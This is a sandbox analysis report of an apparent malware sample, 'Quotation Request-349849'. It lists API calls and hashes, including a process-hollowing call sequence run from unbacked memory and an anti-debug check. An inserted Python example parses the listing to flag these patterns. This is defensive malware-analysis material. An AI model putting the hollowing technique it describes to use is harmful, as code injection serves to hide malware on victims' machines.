                                                      • _free.LIBCMT ref: 008396A2
                                                      • _free.LIBCMT ref: 008396A9
                                                      • _free.LIBCMT ref: 00839714
                                                        • Part of subcall function 007F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9A24), ref: 007F2D69
                                                        • Part of subcall function 007F2D55: GetLastError.KERNEL32(00000000,?,007F9A24), ref: 007F2D7B
                                                      • _free.LIBCMT ref: 0083971C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                      • Instruction ID: 3a5ab82d76b064bd807a9907729354e016896a7bd704cb2d7445598d89a3659c
                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                      • Instruction Fuzzy Hash: 32513CB1904218EBDF249F64CC85AAEBBB9FF88300F10449EF649A3351DB755A818F59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction ID: 2d9d3f6fbed902ecff2d2d8771687d3c1b1d9480e785cf75b29ab03764bd44aa
                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction Fuzzy Hash: EE41D374A0074EEBDB189E69C8849BF7BA5EF423A0B24813DEA15C7740EB78DD408B50
                                                      APIs
                                                      • _memset.LIBCMT ref: 007D44CF
                                                        • Part of subcall function 007D407C: _memset.LIBCMT ref: 007D40FC
                                                        • Part of subcall function 007D407C: _wcscpy.LIBCMT ref: 007D4150
                                                        • Part of subcall function 007D407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4160
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 007D4524
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D4533
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0080D4B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 48efde4f6287a882caf06f663ab591934054029a9574dee872812d8ee67ff743
                                                      • Instruction ID: f17913f685956590b9a962d170839a06d5883bafc593fb809034f5d88af0055c
                                                      • Opcode Fuzzy Hash: 48efde4f6287a882caf06f663ab591934054029a9574dee872812d8ee67ff743
                                                      • Instruction Fuzzy Hash: 4E21C570504784AFE7729B64DC59BE6BBECFF05319F04009EE79E96282C3782984CB55
                                                      APIs
                                                      • _memset.LIBCMT ref: 0080EA39
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0080EA83
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 007F0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F07B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: 2645f085df251a142005be0d3b219b607f7ebf68cb21273ff7f902aee128b9ce
                                                      • Instruction ID: 99378a629945d402f815f28c2d3ebad2e890f254607a57c3d16f5dbf086dfad9
                                                      • Opcode Fuzzy Hash: 2645f085df251a142005be0d3b219b607f7ebf68cb21273ff7f902aee128b9ce
                                                      • Instruction Fuzzy Hash: BD219F71A00258DBCB559BD4CC49AEE7BF8BF48310F04405AE508E7381DBB85989CFA1
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 008398F8
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0083990F
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 0e6ce88b0734726beab6279e59b9d3e1c968ec3bf9015a18402c8fde54d8147b
                                                      • Instruction ID: 444e2d7f764a3eca8cb66c49e6209b6224232d63895998b9604483b8ae357e88
                                                      • Opcode Fuzzy Hash: 0e6ce88b0734726beab6279e59b9d3e1c968ec3bf9015a18402c8fde54d8147b
                                                      • Instruction Fuzzy Hash: 76D05EB958030DABDB50ABA0DC0EF9A773CF704702F4002B1BB54D61A2EAB495988B91
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a1f7b64eca03fb803ff0472b585efe3d4bc8dbaf5a1e26d6980a792c90dcccc
                                                      • Instruction ID: 1666769c1169c2bf6df5e2bc9ba4cdb8c32e421614e5b94b30153524cf8c06b6
                                                      • Opcode Fuzzy Hash: 9a1f7b64eca03fb803ff0472b585efe3d4bc8dbaf5a1e26d6980a792c90dcccc
                                                      • Instruction Fuzzy Hash: 51F12770A083459FC754DF28C484A6ABBE9FF88314F14892EF8999B351DB74E945CF82
                                                      APIs
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F0193
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007F019B
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F01A6
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F01B1
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007F01B9
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007F01C1
                                                        • Part of subcall function 007E60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007DF930), ref: 007E6154
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007DF9CD
                                                      • OleInitialize.OLE32(00000000), ref: 007DFA4A
                                                      • CloseHandle.KERNEL32(00000000), ref: 008145C8
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 92ad3ec00ff5f3cce05d29f4c5726b3e55d58e308b45e3f1c373dcb531cc69a1
                                                      • Instruction ID: 1db78a3762dbf79ebcefafa42737992dddb3f776018777e5399e81dec0b4ea62
                                                      • Opcode Fuzzy Hash: 92ad3ec00ff5f3cce05d29f4c5726b3e55d58e308b45e3f1c373dcb531cc69a1
                                                      • Instruction Fuzzy Hash: 4C81EBF0902A40DFC786FFB9E8556187BE5FB89306758812BD109CB322EB744188CF59
                                                      APIs
                                                      • _memset.LIBCMT ref: 007D4370
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D4415
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D4432
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 283a77d0dc8141b3e5302f9a5c6c7e878d07eb31e3963f63b6c09393e529f8c5
                                                      • Instruction ID: 18aeb45c09e2f7393e7e933d07f2b91baf83b217911ad5f98c1836381a243c38
                                                      • Opcode Fuzzy Hash: 283a77d0dc8141b3e5302f9a5c6c7e878d07eb31e3963f63b6c09393e529f8c5
                                                      • Instruction Fuzzy Hash: FA319EB0504701DFC721EF68D88469BBBF8FB48309F00092FF69A92391E775A944CB92
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007FA16B: __NMSG_WRITE.LIBCMT ref: 007FA192
                                                        • Part of subcall function 007FA16B: __NMSG_WRITE.LIBCMT ref: 007FA19C
                                                      • __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007FA1C8: GetModuleFileNameW.KERNEL32(00000000,008933BA,00000104,?,00000001,00000000), ref: 007FA25A
                                                        • Part of subcall function 007FA1C8: ___crtMessageBoxW.LIBCMT ref: 007FA308
                                                        • Part of subcall function 007F309F: ___crtCorExitProcess.LIBCMT ref: 007F30A5
                                                        • Part of subcall function 007F309F: ExitProcess.KERNEL32 ref: 007F30AE
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 6cf65307aed18558defc7fee31da19bda090149fae029c37a3bea942102abeee
                                                      • Instruction ID: b959ba22e721029be8a8adfd9c18b4fd22b926f896d572d26e0424b4e9db4443
                                                      • Opcode Fuzzy Hash: 6cf65307aed18558defc7fee31da19bda090149fae029c37a3bea942102abeee
                                                      • Instruction Fuzzy Hash: F501DE75340B0DEAD6113778EC8AA3E7798AF82362F210026F7199A382DE7C98004671
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00839548,?,?,?,?,?,00000004), ref: 008398BB
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00839548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008398D1
                                                      • CloseHandle.KERNEL32(00000000,?,00839548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008398D8
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
                                                      • Instruction ID: f1f7a051a22b39b3b4a94103fc8461846801d692b964fbcacc37513e3b2dece7
                                                      • Opcode Fuzzy Hash: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
                                                      • Instruction Fuzzy Hash: 1AE08632181714B7E7222B54EC09FCA7B19FB46762F104120FB54A90E187B5151197D8
                                                      APIs
                                                      • _free.LIBCMT ref: 00838D1B
                                                        • Part of subcall function 007F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9A24), ref: 007F2D69
                                                        • Part of subcall function 007F2D55: GetLastError.KERNEL32(00000000,?,007F9A24), ref: 007F2D7B
                                                      • _free.LIBCMT ref: 00838D2C
                                                      • _free.LIBCMT ref: 00838D3E
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                      • Instruction ID: 2ab5cb4b9dba3bdf2d347553e527ec451e439962b47e0ca4e38f1514bc8963dc
                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                      • Instruction Fuzzy Hash: AEE012A1701709C6DF24A578A945AA313DC9F98352B14091DB50DD7287CE68F8438164
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 73c3e23fcf1a2d37ff0860b8758573e72b4294d744d1e9073a358524d62f3ce9
                                                      • Instruction ID: 7ccd7026de68cd4867dc1a679e2ff8afbf04f3650bd4f3fab02ad83b46812dad
                                                      • Opcode Fuzzy Hash: 73c3e23fcf1a2d37ff0860b8758573e72b4294d744d1e9073a358524d62f3ce9
                                                      • Instruction Fuzzy Hash: F9224B70508201DFCB24DF14C495A6AB7F1FF84314F19896EE98A9B362D739ED85CB82
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: 5e39902c4aa5aeadb710cadad6c84017b37f3147602d6f54640f5e1f761ee2d4
                                                      • Instruction ID: 1524d8d2896e33212c5b4912194b643fb0e01aeaf16783396d0133971259facd
                                                      • Opcode Fuzzy Hash: 5e39902c4aa5aeadb710cadad6c84017b37f3147602d6f54640f5e1f761ee2d4
                                                      • Instruction Fuzzy Hash: 10414861B04258ABDF219B64CC957BE7BB3EB45300F284477EE86DA382D63C9D4483A1
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 3ead9eb11a7a88a66379414eca88ae24bc3e49762ab4e0552c745a04d14b9f59
                                                      • Instruction ID: a26931a462d127eda43f9410f0366db7612ea715ddb635bf7792e37780117e8f
                                                      • Opcode Fuzzy Hash: 3ead9eb11a7a88a66379414eca88ae24bc3e49762ab4e0552c745a04d14b9f59
                                                      • Instruction Fuzzy Hash: C441C7B1508209DBCB20EFA8D8899BAB7B4FF89304F244469E245D7342DB79DC01D7E4
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                      • Instruction ID: 5c8f7181d6425f4b053afcdd77b3b0bbb05ff75a19f4fdfd60ae44d97d518f5d
                                                      • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                      • Instruction Fuzzy Hash: 0B3173B5604606AFC708DF6CC8D1D69B3A9FF88320715C62AE519CB391EB34E950CB90
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 007D4834
                                                        • Part of subcall function 007F336C: __lock.LIBCMT ref: 007F3372
                                                        • Part of subcall function 007F336C: DecodePointer.KERNEL32(00000001,?,007D4849,00827C74), ref: 007F337E
                                                        • Part of subcall function 007F336C: EncodePointer.KERNEL32(?,?,007D4849,00827C74), ref: 007F3389
                                                        • Part of subcall function 007D48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007D4915
                                                        • Part of subcall function 007D48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D492A
                                                        • Part of subcall function 007D3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B68
                                                        • Part of subcall function 007D3B3A: IsDebuggerPresent.KERNEL32 ref: 007D3B7A
                                                        • Part of subcall function 007D3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008952F8,008952E0,?,?), ref: 007D3BEB
                                                        • Part of subcall function 007D3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C6F
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D4874
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: 5a1d3750560e82a32929ef292053fbfb010fff10bcb75391bde2ce38cf58f765
                                                      • Instruction ID: 42724fed4319c404e51756dbeaa816a650d25d083ba697d4f645047964f96ac7
                                                      • Opcode Fuzzy Hash: 5a1d3750560e82a32929ef292053fbfb010fff10bcb75391bde2ce38cf58f765
                                                      • Instruction Fuzzy Hash: 861189719083459FC700EFA9E80990ABBF8FF89B50F14491BF140932B1DBB4A648CB92
                                                      APIs
                                                        • Part of subcall function 007F571C: __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007F571C: __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007F571C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      • std::exception::exception.LIBCMT ref: 007F0DEC
                                                      • __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                        • Part of subcall function 007F859B: RaiseException.KERNEL32(?,?,?,00889E78,00000000,?,?,?,?,007F0E06,?,00889E78,?,00000001), ref: 007F85F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 46e0a3a2e60f9ebe6a158228c424fd40d76a1069796431b519c9e4a5fa05b1ca
                                                      • Instruction ID: d8dc44ec3c26cd25c68274b80c90d4381891a39b321862e7e3f1b47a538b097d
                                                      • Opcode Fuzzy Hash: 46e0a3a2e60f9ebe6a158228c424fd40d76a1069796431b519c9e4a5fa05b1ca
                                                      • Instruction Fuzzy Hash: 48F0A43190021EA6CB10BBE8EC099FE7BACEF01351F104469FB14D6382DFB89A5486D1
                                                      APIs
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • __lock_file.LIBCMT ref: 007F53EB
                                                        • Part of subcall function 007F6C11: __lock.LIBCMT ref: 007F6C34
                                                      • __fclose_nolock.LIBCMT ref: 007F53F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 5d4faf905433a1a3e1de37217a216b23c39ced3d7a6be8751fd2bd2f39139403
                                                      • Instruction ID: c0671fae0674d368000f8b5f76220fce69f6574397104508ba7a6a55c38c0980
                                                      • Opcode Fuzzy Hash: 5d4faf905433a1a3e1de37217a216b23c39ced3d7a6be8751fd2bd2f39139403
                                                      • Instruction Fuzzy Hash: DAF09071900A0CDADB51AB79D80A7BD66A06F41378F248209A764AB3C1CBFC9941AB52
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015EACF3
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015EAD89
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015EADAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction ID: 507c0b0f2ff20fa064e9ad4551d83a8feaae431b222ab3b80b4c55309a0f152e
                                                      • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction Fuzzy Hash: 1E12DD20E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
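A worked example added by the editor, not part of the Joe Sandbox report: a small parser for the `APIs` entries in this listing that flags the two things a triager would pull out of the blocks above. The `IsDebuggerPresent` call at 007D3B7A sits in the PE-backed image at 007D0000 (the AutoIt interpreter) and is a routine runtime check on its own, so it is reported but kept separate from the strong signal. The `CreateProcessW` / `Wow64GetThreadContext` / `ReadProcessMemory` sequence at 015EACF3 to 015EADAB runs from memory the report marks `based on PE: false`, i.e. code with no image backing, and is the process-hollowing pattern: spawn a child, fetch its thread context (0x00010007 is CONTEXT_FULL for x86), then read 4 bytes from it, which is consistent with reading the child's image base from its PEB. The sample input is constructed from the report's own lines; the indicator sets and the tag names are the editor's assumptions, not Joe Sandbox signatures.

```python
"""Flag process-hollowing and anti-debug API sequences in a Joe Sandbox
function listing and separate code that runs from a PE image from code
that runs out of non-image memory (an unpacked stage or shellcode)."""
import re

# Constructed sample in the format of the report's "APIs" entries. Names,
# arguments and ref addresses are copied from the blocks above; the grouping
# into three function blocks mirrors the report's layout.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 007D3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B68
  • Part of subcall function 007D3B3A: IsDebuggerPresent.KERNEL32 ref: 007D3B7A
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D4874
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 015EACF3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015EAD89
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015EADAB
Memory Dump Source
• Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
APIs
• Sleep.KERNELBASE(000001F4), ref: 015EB549
Memory Dump Source
• Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR". Args are left as the raw strings.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SOURCE_RE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)"
)

# Indicator sets (editor's assumptions). Hollowing needs all three groups
# inside one function: create a child, touch its thread context, and access
# memory across the process boundary.
CREATE = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
CONTEXT = {"GetThreadContext", "Wow64GetThreadContext",
           "SetThreadContext", "Wow64SetThreadContext"}
XPROCMEM = {"ReadProcessMemory", "WriteProcessMemory",
            "NtReadVirtualMemory", "NtWriteVirtualMemory"}
ANTIDBG = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
           "OutputDebugStringA", "OutputDebugStringW"}


def parse_blocks(report):
    """Split the listing into function blocks: calls plus their memory source."""
    blocks, current = [], None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "offset": None, "pe_backed": None}
            continue
        if current is None:
            continue
        m = CALL_RE.search(line)
        if m:
            args = m.group("args")
            current["calls"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": args.split(",") if args else [], "ref": m.group("ref"),
            })
            continue
        m = SOURCE_RE.search(line)
        if m:  # the Source File line closes the block
            current["offset"] = m.group("offset")
            current["pe_backed"] = m.group("pe") == "true"
            blocks.append(current)
            current = None
    return blocks


def classify(block):
    """Tags for one block; a PE-backed IsDebuggerPresent stays 'anti_debug' only."""
    names = {c["name"] for c in block["calls"]}
    tags = set()
    if names & CREATE and names & CONTEXT and names & XPROCMEM:
        tags.add("process_hollowing")
    if names & ANTIDBG:
        tags.add("anti_debug")
    if block["pe_backed"] is False:  # code with no image backing
        tags.add("non_image_code")
    return tags


def read_sizes(block):
    """nSize (4th argument) of each ReadProcessMemory call with a numeric size."""
    sizes = []
    for call in block["calls"]:
        if call["name"] == "ReadProcessMemory" and len(call["args"]) > 3:
            size = call["args"][3]
            if re.fullmatch(r"[0-9A-F]+", size):
                sizes.append(int(size, 16))
    return sizes


def analyze(report):
    """Return one finding per tagged block, with the refs that produced it."""
    findings = []
    for block in parse_blocks(report):
        tags = classify(block)
        if tags:
            findings.append({"offset": block["offset"], "tags": tags,
                             "refs": [c["ref"] for c in block["calls"]],
                             "read_sizes": read_sizes(block)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_REPORT):
        print(f"{f['offset']}: {', '.join(sorted(f['tags']))} refs={f['refs']}")
```

Run against the whole listing, the `non_image_code` tag is what separates the unpacked stage at 015E9000 from the AutoIt runtime at 007D0000; a hollowing sequence or anti-debug call is much more interesting in the former, and the 4-byte `ReadProcessMemory` size is the detail to confirm in a debugger before calling it a PEB read.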
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: cd74a2443cbee5d9116be2cdd5c18865a5da2d72c7552e1860fddd5c8ad97f53
